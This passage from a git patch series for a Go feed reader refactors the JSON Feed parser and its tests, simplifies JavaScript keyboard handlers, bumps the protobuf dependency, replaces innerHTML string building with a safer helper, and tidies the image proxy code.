+ // Type defines the protocol used to talk with the hub: "rssCloud" or "WebSub".
+ Type string `json:"type"`
+
+ // URL is the location of the hub.
+ URL string `json:"url"`
}
-type jsonAttachment struct {
- URL string `json:"url"`
+type JSONItem struct {
+ // Unique identifier for the item.
+ // Ideally, the id is the full URL of the resource described by the item, since URLs make great unique identifiers.
+ ID string `json:"id"`
+
+ // URL of the resource described by the item.
+ URL string `json:"url"`
+
+ // ExternalURL is the URL of a page elsewhere.
+ // This is especially useful for linkblogs.
+ // If url links to where you’re talking about a thing, then external_url links to the thing you’re talking about.
+ ExternalURL string `json:"external_url"`
+
+ // Title of the item (optional).
+ // Microblog items in particular may omit titles.
+ Title string `json:"title"`
+
+ // ContentHTML is the HTML body of the item.
+ ContentHTML string `json:"content_html"`
+
+ // ContentText is the text body of the item.
+ ContentText string `json:"content_text"`
+
+ // Summary is a plain text sentence or two describing the item.
+ Summary string `json:"summary"`
+
+ // ImageURL is the URL of the main image for the item.
+ ImageURL string `json:"image"`
+
+ // BannerImageURL is the URL of an image to use as a banner.
+ BannerImageURL string `json:"banner_image"`
+
+ // DatePublished is the date the item was published.
+ DatePublished string `json:"date_published"`
+
+ // DateModified is the date the item was modified.
+ DateModified string `json:"date_modified"`
+
+ // Language is the language of the item.
+ Language string `json:"language"`
+
+ // Authors is an array of JSONAuthor.
+ Authors []JSONAuthor `json:"authors"`
+
+ // Author is a JSONAuthor.
+ // JSON Feed v1 (deprecated)
+ Author JSONAuthor `json:"author"`
+
+ // Tags is an array of strings.
+ Tags []string `json:"tags"`
+
+ // Attachments is an array of JSONAttachment.
+ Attachments []JSONAttachment `json:"attachments"`
+}
+
+type JSONAttachment struct {
+ // URL of the attachment.
+ URL string `json:"url"`
+
+ // MIME type of the attachment.
MimeType string `json:"mime_type"`
- Title string `json:"title"`
- Size int64 `json:"size_in_bytes"`
- Duration int `json:"duration_in_seconds"`
-}
-
-func (j *jsonFeed) GetAuthor() string {
- if len(j.Authors) > 0 {
- return (getAuthor(j.Authors[0]))
- }
- return getAuthor(j.Author)
-}
-
-func (j *jsonFeed) Transform(baseURL string) *model.Feed {
- var err error
-
- feed := new(model.Feed)
-
- feed.FeedURL, err = urllib.AbsoluteURL(baseURL, j.FeedURL)
- if err != nil {
- feed.FeedURL = j.FeedURL
- }
-
- feed.SiteURL, err = urllib.AbsoluteURL(baseURL, j.SiteURL)
- if err != nil {
- feed.SiteURL = j.SiteURL
- }
-
- feed.IconURL = strings.TrimSpace(j.IconURL)
-
- if feed.IconURL == "" {
- feed.IconURL = strings.TrimSpace(j.FaviconURL)
- }
-
- feed.Title = strings.TrimSpace(j.Title)
- if feed.Title == "" {
- feed.Title = feed.SiteURL
- }
-
- for _, item := range j.Items {
- entry := item.Transform()
- entryURL, err := urllib.AbsoluteURL(feed.SiteURL, entry.URL)
- if err == nil {
- entry.URL = entryURL
- }
-
- if entry.Author == "" {
- entry.Author = j.GetAuthor()
- }
-
- feed.Entries = append(feed.Entries, entry)
- }
-
- return feed
-}
-
-func (j *jsonItem) GetDate() time.Time {
- for _, value := range []string{j.DatePublished, j.DateModified} {
- if value != "" {
- d, err := date.Parse(value)
- if err != nil {
- slog.Debug("Unable to parse date from JSON feed",
- slog.String("date", value),
- slog.String("url", j.URL),
- slog.Any("error", err),
- )
- return time.Now()
- }
-
- return d
- }
- }
-
- return time.Now()
-}
-
-func (j *jsonItem) GetAuthor() string {
- if len(j.Authors) > 0 {
- return getAuthor(j.Authors[0])
- }
- return getAuthor(j.Author)
-}
-
-func (j *jsonItem) GetHash() string {
- for _, value := range []string{j.ID, j.URL, j.Text + j.HTML + j.Summary} {
- if value != "" {
- return crypto.Hash(value)
- }
- }
-
- return ""
-}
-
-func (j *jsonItem) GetTitle() string {
- if j.Title != "" {
- return j.Title
- }
-
- for _, value := range []string{j.Summary, j.Text, j.HTML} {
- if value != "" {
- return sanitizer.TruncateHTML(value, 100)
- }
- }
-
- return j.URL
-}
-
-func (j *jsonItem) GetContent() string {
- for _, value := range []string{j.HTML, j.Text, j.Summary} {
- if value != "" {
- return value
- }
- }
-
- return ""
-}
-
-func (j *jsonItem) GetEnclosures() model.EnclosureList {
- enclosures := make(model.EnclosureList, 0)
-
- for _, attachment := range j.Attachments {
- if attachment.URL == "" {
- continue
- }
-
- enclosures = append(enclosures, &model.Enclosure{
- URL: attachment.URL,
- MimeType: attachment.MimeType,
- Size: attachment.Size,
- })
- }
-
- return enclosures
-}
-
-func (j *jsonItem) Transform() *model.Entry {
- entry := model.NewEntry()
- entry.URL = j.URL
- entry.Date = j.GetDate()
- entry.Author = j.GetAuthor()
- entry.Hash = j.GetHash()
- entry.Content = j.GetContent()
- entry.Title = strings.TrimSpace(j.GetTitle())
- entry.Enclosures = j.GetEnclosures()
- if len(j.Tags) > 0 {
- entry.Tags = j.Tags
- }
-
- return entry
-}
-
-func getAuthor(author jsonAuthor) string {
- if author.Name != "" {
- return strings.TrimSpace(author.Name)
- }
-
- return ""
+
+ // Title of the attachment.
+ Title string `json:"title"`
+
+ // Size of the attachment in bytes.
+ Size int64 `json:"size_in_bytes"`
+
+ // Duration of the attachment in seconds.
+ Duration int `json:"duration_in_seconds"`
}
diff --git a/internal/reader/json/parser.go b/internal/reader/json/parser.go
index ee0f634d..69a0f523 100644
--- a/internal/reader/json/parser.go
+++ b/internal/reader/json/parser.go
@@ -13,10 +13,10 @@ import (
// Parse returns a normalized feed struct from a JSON feed.
func Parse(baseURL string, data io.Reader) (*model.Feed, error) {
- feed := new(jsonFeed)
- if err := json.NewDecoder(data).Decode(&feed); err != nil {
+ jsonFeed := new(JSONFeed)
+ if err := json.NewDecoder(data).Decode(&jsonFeed); err != nil {
return nil, fmt.Errorf("json: unable to parse feed: %w", err)
}
- return feed.Transform(baseURL), nil
+ return NewJSONAdapter(jsonFeed).BuildFeed(baseURL), nil
}
diff --git a/internal/reader/json/parser_test.go b/internal/reader/json/parser_test.go
index 02664f5c..8e4102e0 100644
--- a/internal/reader/json/parser_test.go
+++ b/internal/reader/json/parser_test.go
@@ -10,7 +10,7 @@ import (
"time"
)
-func TestParseJsonFeed(t *testing.T) {
+func TestParseJsonFeedVersion1(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"title": "My Example Feed",
@@ -49,7 +49,7 @@ func TestParseJsonFeed(t *testing.T) {
t.Errorf("Incorrect site URL, got: %s", feed.SiteURL)
}
- if feed.IconURL != "https://micro.blog/jsonfeed/avatar.jpg" {
+ if feed.IconURL != "https://micro.blog/jsonfeed/favicon.png" {
t.Errorf("Incorrect icon URL, got: %s", feed.IconURL)
}
@@ -177,7 +177,81 @@ func TestParsePodcast(t *testing.T) {
}
}
-func TestParseEntryWithoutAttachmentURL(t *testing.T) {
+func TestParseFeedWithoutTitle(t *testing.T) {
+ data := `{
+ "version": "https://jsonfeed.org/version/1",
+ "home_page_url": "https://example.org/",
+ "feed_url": "https://example.org/feed.json",
+ "items": [
+ {
+ "id": "2347259",
+ "url": "https://example.org/2347259",
+ "content_text": "Cats are neat. \n\nhttps://example.org/cats",
+ "date_published": "2016-02-09T14:22:00-07:00"
+ }
+ ]
+ }`
+
+ feed, err := Parse("https://example.org/feed.json", bytes.NewBufferString(data))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.Title != "https://example.org/" {
+ t.Errorf("Incorrect title, got: %s", feed.Title)
+ }
+}
+
+func TestParseFeedWithoutHomePage(t *testing.T) {
+ data := `{
+ "version": "https://jsonfeed.org/version/1",
+ "feed_url": "https://example.org/feed.json",
+ "title": "Some test",
+ "items": [
+ {
+ "id": "2347259",
+ "url": "https://example.org/2347259",
+ "content_text": "Cats are neat. \n\nhttps://example.org/cats",
+ "date_published": "2016-02-09T14:22:00-07:00"
+ }
+ ]
+ }`
+
+ feed, err := Parse("https://example.org/feed.json", bytes.NewBufferString(data))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.SiteURL != "https://example.org/feed.json" {
+ t.Errorf("Incorrect title, got: %s", feed.Title)
+ }
+}
+
+func TestParseFeedWithoutFeedURL(t *testing.T) {
+ data := `{
+ "version": "https://jsonfeed.org/version/1",
+ "title": "Some test",
+ "items": [
+ {
+ "id": "2347259",
+ "url": "https://example.org/2347259",
+ "content_text": "Cats are neat. \n\nhttps://example.org/cats",
+ "date_published": "2016-02-09T14:22:00-07:00"
+ }
+ ]
+ }`
+
+ feed, err := Parse("https://example.org/feed.json", bytes.NewBufferString(data))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.SiteURL != "https://example.org/feed.json" {
+ t.Errorf("Incorrect title, got: %s", feed.Title)
+ }
+}
+
+func TestParseItemWithoutAttachmentURL(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"user_comment": "This is a podcast feed. You can add this feed to your podcast client using the following URL: http://therecord.co/feed.json",
@@ -216,7 +290,7 @@ func TestParseEntryWithoutAttachmentURL(t *testing.T) {
}
}
-func TestParseFeedWithRelativeURL(t *testing.T) {
+func TestParseItemWithRelativeURL(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"title": "Example",
@@ -241,7 +315,7 @@ func TestParseFeedWithRelativeURL(t *testing.T) {
}
}
-func TestParseAuthor(t *testing.T) {
+func TestParseItemWithLegacyAuthorField(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"user_comment": "This is a microblog feed. You can add this to your feed reader using the following URL: https://example.org/feed.json",
@@ -277,7 +351,7 @@ func TestParseAuthor(t *testing.T) {
}
}
-func TestParseAuthors(t *testing.T) {
+func TestParseItemWithMultipleAuthorFields(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1.1",
"user_comment": "This is a microblog feed. You can add this to your feed reader using the following URL: https://example.org/feed.json",
@@ -285,11 +359,11 @@ func TestParseAuthors(t *testing.T) {
"home_page_url": "https://example.org/",
"feed_url": "https://example.org/feed.json",
"author": {
- "name": "This field is deprecated, use authors",
+ "name": "Deprecated Author Field",
"url": "http://example.org/",
"avatar": "https://example.org/avatar.png"
},
- "authors": [
+ "authors": [
{
"name": "Brent Simmons",
"url": "http://example.org/",
@@ -315,14 +389,15 @@ func TestParseAuthors(t *testing.T) {
t.Errorf("Incorrect number of entries, got: %d", len(feed.Entries))
}
- if feed.Entries[0].Author != "Brent Simmons" {
+ if feed.Entries[0].Author != "Brent Simmons, Deprecated Author Field" {
t.Errorf("Incorrect entry author, got: %s", feed.Entries[0].Author)
}
}
-func TestParseFeedWithoutTitle(t *testing.T) {
+func TestParseItemWithMultipleDuplicateAuthors(t *testing.T) {
data := `{
- "version": "https://jsonfeed.org/version/1",
+ "version": "https://jsonfeed.org/version/1.1",
+ "title": "Example",
"home_page_url": "https://example.org/",
"feed_url": "https://example.org/feed.json",
"items": [
@@ -330,7 +405,24 @@ func TestParseFeedWithoutTitle(t *testing.T) {
"id": "2347259",
"url": "https://example.org/2347259",
"content_text": "Cats are neat. \n\nhttps://example.org/cats",
- "date_published": "2016-02-09T14:22:00-07:00"
+ "date_published": "2016-02-09T14:22:00-07:00",
+ "authors": [
+ {
+ "name": "Author B",
+ "url": "http://example.org/",
+ "avatar": "https://example.org/avatar.png"
+ },
+ {
+ "name": "Author A",
+ "url": "http://example.org/",
+ "avatar": "https://example.org/avatar.png"
+ },
+ {
+ "name": "Author B",
+ "url": "http://example.org/",
+ "avatar": "https://example.org/avatar.png"
+ }
+ ]
}
]
}`
@@ -340,12 +432,16 @@ func TestParseFeedWithoutTitle(t *testing.T) {
t.Fatal(err)
}
- if feed.Title != "https://example.org/" {
- t.Errorf("Incorrect title, got: %s", feed.Title)
+ if len(feed.Entries) != 1 {
+ t.Errorf("Incorrect number of entries, got: %d", len(feed.Entries))
+ }
+
+ if feed.Entries[0].Author != "Author A, Author B" {
+ t.Errorf("Incorrect entry author, got: %s", feed.Entries[0].Author)
}
}
-func TestParseFeedItemWithInvalidDate(t *testing.T) {
+func TestParseItemWithInvalidDate(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"title": "My Example Feed",
@@ -376,34 +472,7 @@ func TestParseFeedItemWithInvalidDate(t *testing.T) {
}
}
-func TestParseFeedItemWithoutID(t *testing.T) {
- data := `{
- "version": "https://jsonfeed.org/version/1",
- "title": "My Example Feed",
- "home_page_url": "https://example.org/",
- "feed_url": "https://example.org/feed.json",
- "items": [
- {
- "content_text": "Some text."
- }
- ]
- }`
-
- feed, err := Parse("https://example.org/feed.json", bytes.NewBufferString(data))
- if err != nil {
- t.Fatal(err)
- }
-
- if len(feed.Entries) != 1 {
- t.Errorf("Incorrect number of entries, got: %d", len(feed.Entries))
- }
-
- if feed.Entries[0].Hash != "13b4c5aecd1b6d749afcee968fbf9c80f1ed1bbdbe1aaf25cb34ebd01144bbe9" {
- t.Errorf("Incorrect entry hash, got: %s", feed.Entries[0].Hash)
- }
-}
-
-func TestParseFeedItemWithoutTitleButWithURL(t *testing.T) {
+func TestParseItemWithoutTitleButWithURL(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"title": "My Example Feed",
@@ -430,7 +499,7 @@ func TestParseFeedItemWithoutTitleButWithURL(t *testing.T) {
}
}
-func TestParseFeedItemWithoutTitleButWithSummary(t *testing.T) {
+func TestParseItemWithoutTitleButWithSummary(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"title": "My Example Feed",
@@ -457,7 +526,7 @@ func TestParseFeedItemWithoutTitleButWithSummary(t *testing.T) {
}
}
-func TestParseFeedItemWithoutTitleButWithHTMLContent(t *testing.T) {
+func TestParseItemWithoutTitleButWithHTMLContent(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"title": "My Example Feed",
@@ -484,7 +553,7 @@ func TestParseFeedItemWithoutTitleButWithHTMLContent(t *testing.T) {
}
}
-func TestParseFeedItemWithoutTitleButWithTextContent(t *testing.T) {
+func TestParseItemWithoutTitleButWithTextContent(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"title": "My Example Feed",
@@ -515,7 +584,7 @@ func TestParseFeedItemWithoutTitleButWithTextContent(t *testing.T) {
}
}
-func TestParseTruncateItemTitleUnicode(t *testing.T) {
+func TestParseItemWithTooLongUnicodeTitle(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"title": "My Example Feed",
@@ -573,15 +642,34 @@ func TestParseItemTitleWithXMLTags(t *testing.T) {
}
}
-func TestParseInvalidJSON(t *testing.T) {
- data := `garbage`
- _, err := Parse("https://example.org/feed.json", bytes.NewBufferString(data))
- if err == nil {
- t.Error("Parse should returns an error")
+func TestParseItemWithoutID(t *testing.T) {
+ data := `{
+ "version": "https://jsonfeed.org/version/1",
+ "title": "My Example Feed",
+ "home_page_url": "https://example.org/",
+ "feed_url": "https://example.org/feed.json",
+ "items": [
+ {
+ "content_text": "Some text."
+ }
+ ]
+ }`
+
+ feed, err := Parse("https://example.org/feed.json", bytes.NewBufferString(data))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if len(feed.Entries) != 1 {
+ t.Errorf("Incorrect number of entries, got: %d", len(feed.Entries))
+ }
+
+ if feed.Entries[0].Hash != "13b4c5aecd1b6d749afcee968fbf9c80f1ed1bbdbe1aaf25cb34ebd01144bbe9" {
+ t.Errorf("Incorrect entry hash, got: %s", feed.Entries[0].Hash)
}
}
-func TestParseTags(t *testing.T) {
+func TestParseItemTags(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"user_comment": "This is a microblog feed. You can add this to your feed reader using the following URL: https://example.org/feed.json",
@@ -600,7 +688,8 @@ func TestParseTags(t *testing.T) {
"content_text": "Cats are neat. \n\nhttps://example.org/cats",
"date_published": "2016-02-09T14:22:00-07:00",
"tags": [
- "tag 1",
+ " tag 1",
+ " ",
"tag 2"
]
}
@@ -623,11 +712,11 @@ func TestParseTags(t *testing.T) {
}
}
-func TestParseFavicon(t *testing.T) {
+func TestParseFeedFavicon(t *testing.T) {
data := `{
"version": "https://jsonfeed.org/version/1",
"title": "My Example Feed",
- "favicon": "https://micro.blog/jsonfeed/favicon.png",
+ "favicon": "https://example.org/jsonfeed/favicon.png",
"home_page_url": "https://example.org/",
"feed_url": "https://example.org/feed.json",
"items": [
@@ -648,7 +737,45 @@ func TestParseFavicon(t *testing.T) {
if err != nil {
t.Fatal(err)
}
- if feed.IconURL != "https://micro.blog/jsonfeed/favicon.png" {
+ if feed.IconURL != "https://example.org/jsonfeed/favicon.png" {
t.Errorf("Incorrect icon URL, got: %s", feed.IconURL)
}
}
+
+func TestParseFeedIcon(t *testing.T) {
+ data := `{
+ "version": "https://jsonfeed.org/version/1",
+ "title": "My Example Feed",
+ "icon": "https://example.org/jsonfeed/icon.png",
+ "home_page_url": "https://example.org/",
+ "feed_url": "https://example.org/feed.json",
+ "items": [
+ {
+ "id": "2",
+ "content_text": "This is a second item.",
+ "url": "https://example.org/second-item"
+ },
+ {
+ "id": "1",
+ "content_html": "
Hello, world!
",
+ "url": "https://example.org/initial-post"
+ }
+ ]
+ }`
+
+ feed, err := Parse("https://example.org/feed.json", bytes.NewBufferString(data))
+ if err != nil {
+ t.Fatal(err)
+ }
+ if feed.IconURL != "https://example.org/jsonfeed/icon.png" {
+ t.Errorf("Incorrect icon URL, got: %s", feed.IconURL)
+ }
+}
+
+func TestParseInvalidJSON(t *testing.T) {
+ data := `garbage`
+ _, err := Parse("https://example.org/feed.json", bytes.NewBufferString(data))
+ if err == nil {
+ t.Error("Parse should returns an error")
+ }
+}
From d25c032171e47799da40a155bd172308fbfb036f Mon Sep 17 00:00:00 2001
From: jvoisin
Date: Mon, 11 Mar 2024 01:01:41 +0100
Subject: [PATCH 06/80] Simplify bootstrap.js
- Don't use lambdas to return a function, use directly the function instead.
- Remove a hack for "Chrome 67 and earlier" since it was released in 2018.
---
internal/ui/static/js/bootstrap.js | 56 ++++++++++++++----------------
1 file changed, 26 insertions(+), 30 deletions(-)
diff --git a/internal/ui/static/js/bootstrap.js b/internal/ui/static/js/bootstrap.js
index 53793a4c..e89a74dc 100644
--- a/internal/ui/static/js/bootstrap.js
+++ b/internal/ui/static/js/bootstrap.js
@@ -6,38 +6,38 @@ document.addEventListener("DOMContentLoaded", () => {
keyboardHandler.on("g u", () => goToPage("unread"));
keyboardHandler.on("g b", () => goToPage("starred"));
keyboardHandler.on("g h", () => goToPage("history"));
- keyboardHandler.on("g f", () => goToFeedOrFeeds());
+ keyboardHandler.on("g f", goToFeedOrFeeds);
keyboardHandler.on("g c", () => goToPage("categories"));
keyboardHandler.on("g s", () => goToPage("settings"));
- keyboardHandler.on("ArrowLeft", () => goToPrevious());
- keyboardHandler.on("ArrowRight", () => goToNext());
- keyboardHandler.on("k", () => goToPrevious());
- keyboardHandler.on("p", () => goToPrevious());
- keyboardHandler.on("j", () => goToNext());
- keyboardHandler.on("n", () => goToNext());
+ keyboardHandler.on("ArrowLeft", goToPrevious);
+ keyboardHandler.on("ArrowRight", goToNext);
+ keyboardHandler.on("k", goToPrevious);
+ keyboardHandler.on("p", goToPrevious);
+ keyboardHandler.on("j", goToNext);
+ keyboardHandler.on("n", goToNext);
keyboardHandler.on("h", () => goToPage("previous"));
keyboardHandler.on("l", () => goToPage("next"));
- keyboardHandler.on("z t", () => scrollToCurrentItem());
- keyboardHandler.on("o", () => openSelectedItem());
+ keyboardHandler.on("z t", scrollToCurrentItem);
+ keyboardHandler.on("o", openSelectedItem);
keyboardHandler.on("Enter", () => openSelectedItem());
- keyboardHandler.on("v", () => openOriginalLink());
+ keyboardHandler.on("v", openOriginalLink);
keyboardHandler.on("V", () => openOriginalLink(true));
- keyboardHandler.on("c", () => openCommentLink());
+ keyboardHandler.on("c", openCommentLink);
keyboardHandler.on("C", () => openCommentLink(true));
keyboardHandler.on("m", () => handleEntryStatus("next"));
keyboardHandler.on("M", () => handleEntryStatus("previous"));
- keyboardHandler.on("A", () => markPageAsRead());
- keyboardHandler.on("s", () => handleSaveEntry());
- keyboardHandler.on("d", () => handleFetchOriginalContent());
- keyboardHandler.on("f", () => handleBookmark());
- keyboardHandler.on("F", () => goToFeed());
- keyboardHandler.on("R", () => handleRefreshAllFeeds());
- keyboardHandler.on("?", () => showKeyboardShortcuts());
- keyboardHandler.on("+", () => goToAddSubscription());
- keyboardHandler.on("#", () => unsubscribeFromFeed());
+ keyboardHandler.on("A", markPageAsRead);
+ keyboardHandler.on("s", handleSaveEntry);
+ keyboardHandler.on("d", handleFetchOriginalContent);
+ keyboardHandler.on("f", handleBookmark);
+ keyboardHandler.on("F", goToFeed);
+ keyboardHandler.on("R", handleRefreshAllFeeds);
+ keyboardHandler.on("?", showKeyboardShortcuts);
+ keyboardHandler.on("+", goToAddSubscription);
+ keyboardHandler.on("#", unsubscribeFromFeed);
keyboardHandler.on("/", () => goToPage("search"));
keyboardHandler.on("a", () => {
- let enclosureElement = document.querySelector('.entry-enclosures');
+ const enclosureElement = document.querySelector('.entry-enclosures');
if (enclosureElement) {
enclosureElement.toggleAttribute('open');
}
@@ -82,11 +82,10 @@ document.addEventListener("DOMContentLoaded", () => {
onClick(":is(a, button)[data-save-entry]", (event) => handleSaveEntry(event.target));
onClick(":is(a, button)[data-toggle-bookmark]", (event) => handleBookmark(event.target));
- onClick(":is(a, button)[data-fetch-content-entry]", () => handleFetchOriginalContent());
- onClick(":is(a, button)[data-share-status]", () => handleShare());
- onClick(":is(a, button)[data-action=markPageAsRead]", (event) => handleConfirmationMessage(event.target, () => markPageAsRead()));
+ onClick(":is(a, button)[data-fetch-content-entry]", handleFetchOriginalContent);
+ onClick(":is(a, button)[data-share-status]", handleShare);
+ onClick(":is(a, button)[data-action=markPageAsRead]", (event) => handleConfirmationMessage(event.target, markPageAsRead));
onClick(":is(a, button)[data-toggle-status]", (event) => handleEntryStatus("next", event.target));
-
onClick(":is(a, button)[data-confirm]", (event) => handleConfirmationMessage(event.target, (url, redirectURL) => {
let request = new RequestBuilder(url);
@@ -118,8 +117,8 @@ document.addEventListener("DOMContentLoaded", () => {
fixVoiceOverDetailsSummaryBug();
const logoElement = document.querySelector(".logo");
- logoElement.addEventListener("click", (event) => toggleMainMenu(event));
- logoElement.addEventListener("keydown", (event) => toggleMainMenu(event));
+ logoElement.addEventListener("click", toggleMainMenu);
+ logoElement.addEventListener("keydown", toggleMainMenu);
onClick(".header nav li", (event) => onClickMainMenuListItem(event));
@@ -131,9 +130,6 @@ document.addEventListener("DOMContentLoaded", () => {
}
window.addEventListener('beforeinstallprompt', (e) => {
- // Prevent Chrome 67 and earlier from automatically showing the prompt.
- e.preventDefault();
-
let deferredPrompt = e;
const promptHomeScreen = document.getElementById('prompt-home-screen');
if (promptHomeScreen) {
From d862d86f907dea7a612b3fe9bdfde102f097d3f1 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Wed, 13 Mar 2024 23:38:14 +0000
Subject: [PATCH 07/80] Bump google.golang.org/protobuf from 1.32.0 to 1.33.0
Bumps google.golang.org/protobuf from 1.32.0 to 1.33.0.
---
updated-dependencies:
- dependency-name: google.golang.org/protobuf
dependency-type: indirect
...
Signed-off-by: dependabot[bot]
---
go.mod | 2 +-
go.sum | 4 ++--
2 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/go.mod b/go.mod
index 796aedaa..626a87d1 100644
--- a/go.mod
+++ b/go.mod
@@ -42,7 +42,7 @@ require (
golang.org/x/sys v0.18.0 // indirect
golang.org/x/text v0.14.0 // indirect
google.golang.org/appengine v1.6.8 // indirect
- google.golang.org/protobuf v1.32.0 // indirect
+ google.golang.org/protobuf v1.33.0 // indirect
)
go 1.22
diff --git a/go.sum b/go.sum
index 53378572..7ee72412 100644
--- a/go.sum
+++ b/go.sum
@@ -124,8 +124,8 @@ google.golang.org/appengine v1.6.8 h1:IhEN5q69dyKagZPYMSdIjS2HqprW324FRQZJcGqPAs
google.golang.org/appengine v1.6.8/go.mod h1:1jJ3jBArFh5pcgW8gCtRJnepW8FzD1V44FJffLiz/Ds=
google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw=
google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc=
-google.golang.org/protobuf v1.32.0 h1:pPC6BG5ex8PDFnkbrGU3EixyhKcQ2aDuBS36lqK/C7I=
-google.golang.org/protobuf v1.32.0/go.mod h1:c6P6GXX6sHbq/GpV6MGZEdwhWPcYBgnhAHhKbcUYpos=
+google.golang.org/protobuf v1.33.0 h1:uNO2rsAINq/JlFpSdYEKIZ0uKD/R9cpdv0T+yoGwGmI=
+google.golang.org/protobuf v1.33.0/go.mod h1:c6P6GXX6sHbq/GpV6MGZEdwhWPcYBgnhAHhKbcUYpos=
gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=
From e0ee28c01316142de40b6db89d645395251a9dcc Mon Sep 17 00:00:00 2001
From: jvoisin
Date: Wed, 13 Mar 2024 18:20:45 +0100
Subject: [PATCH 08/80] More progress towards trusted-types
Create a new function `addIcon` and use it to add icons, instead of
operating on raw html.
---
internal/ui/static/js/app.js | 28 +++++++++++++++++++++-------
1 file changed, 21 insertions(+), 7 deletions(-)
diff --git a/internal/ui/static/js/app.js b/internal/ui/static/js/app.js
index 51a73e2e..2ce1a1e8 100644
--- a/internal/ui/static/js/app.js
+++ b/internal/ui/static/js/app.js
@@ -167,6 +167,14 @@ function handleEntryStatus(item, element, setToRead) {
}
}
+// Add a span-icon with a `label` to `element` as a child
+function addIcon(element, label) {
+ const span = document.createElement('span');
+ span.classList.add('icon-label');
+ span.textContent = label;
+ element.appendChild(span);
+}
+
// Change the entry status to the opposite value.
function toggleEntryStatus(element, toasting) {
const entryID = parseInt(element.dataset.id, 10);
@@ -193,7 +201,8 @@ function toggleEntryStatus(element, toasting) {
}
}
- link.innerHTML = iconElement.innerHTML + '' + label + '';
+ link.innerHTML = iconElement.innerHTML;
+ addIcon(link, label);
link.dataset.value = newStatus;
if (element.classList.contains("item-status-" + currentStatus)) {
@@ -258,11 +267,13 @@ function saveEntry(element, toasting) {
return;
}
- element.innerHTML = '' + element.dataset.labelLoading + '';
+ element.textContent = "";
+ addIcon(element, element.dataset.labelLoading);
const request = new RequestBuilder(element.dataset.saveUrl);
request.withCallback(() => {
- element.innerHTML = '' + element.dataset.labelDone + '';
+ element.textContent = "";
+ addIcon(element, element.dataset.labelDone);
element.dataset.completed = true;
if (toasting) {
const iconElement = document.querySelector("template#icon-save");
@@ -288,7 +299,8 @@ function toggleBookmark(parentElement, toasting) {
return;
}
- element.innerHTML = '' + element.dataset.labelLoading + '';
+ element.textContent = "";
+ addIcon(element, element.dataset.labelLoading);
const request = new RequestBuilder(element.dataset.bookmarkUrl);
request.withCallback(() => {
@@ -310,7 +322,8 @@ function toggleBookmark(parentElement, toasting) {
}
}
- element.innerHTML = iconElement.innerHTML + '' + label + '';
+ element.innerHTML = iconElement.innerHTML;
+ addIcon(element, label);
element.dataset.value = newStarStatus;
});
request.execute();
@@ -328,7 +341,7 @@ function handleFetchOriginalContent() {
}
const previousElement = element.cloneNode(true);
- element.innerHTML = '' + element.dataset.labelLoading + '';
+ addIcon(element, element.dataset.labelLoading);
const request = new RequestBuilder(element.dataset.fetchContentUrl);
request.withCallback((response) => {
@@ -615,7 +628,8 @@ function showToast(label, iconElement) {
const toastMsgElement = document.getElementById("toast-msg");
if (toastMsgElement) {
- toastMsgElement.innerHTML = iconElement.innerHTML + '' + label + '';
+ toastMsgElement.innerHTML = iconElement.innerHTML;
+ addIcon(toastMsgElement, label);
const toastElementWrapper = document.getElementById("toast-wrapper");
if (toastElementWrapper) {
From 66b8483791e58030c0cc3b5c5d82b0b0d5e87cec Mon Sep 17 00:00:00 2001
From: jvoisin
Date: Wed, 13 Mar 2024 23:16:58 +0100
Subject: [PATCH 09/80] Minor simplification of internal/proxy/proxy.go
- re-use ProxifiedUrl to implement AbsoluteProxifyURL, reducing the copy-pasta
- reduce the internal indentation of ProxifiedUrl by inverting some conditions
---
internal/proxy/proxy.go | 49 ++++++++++++++---------------------------
1 file changed, 16 insertions(+), 33 deletions(-)
diff --git a/internal/proxy/proxy.go b/internal/proxy/proxy.go
index 8b177348..512431df 100644
--- a/internal/proxy/proxy.go
+++ b/internal/proxy/proxy.go
@@ -19,51 +19,34 @@ import (
// ProxifyURL generates a relative URL for a proxified resource.
func ProxifyURL(router *mux.Router, link string) string {
- if link != "" {
- proxyImageUrl := config.Opts.ProxyUrl()
-
- if proxyImageUrl == "" {
- mac := hmac.New(sha256.New, config.Opts.ProxyPrivateKey())
- mac.Write([]byte(link))
- digest := mac.Sum(nil)
- return route.Path(router, "proxy", "encodedDigest", base64.URLEncoding.EncodeToString(digest), "encodedURL", base64.URLEncoding.EncodeToString([]byte(link)))
- }
+ if link == "" {
+ return ""
+ }
+ if proxyImageUrl := config.Opts.ProxyUrl(); proxyImageUrl != "" {
proxyUrl, err := url.Parse(proxyImageUrl)
if err != nil {
return ""
}
-
proxyUrl.Path = path.Join(proxyUrl.Path, base64.URLEncoding.EncodeToString([]byte(link)))
return proxyUrl.String()
}
- return ""
+
+ mac := hmac.New(sha256.New, config.Opts.ProxyPrivateKey())
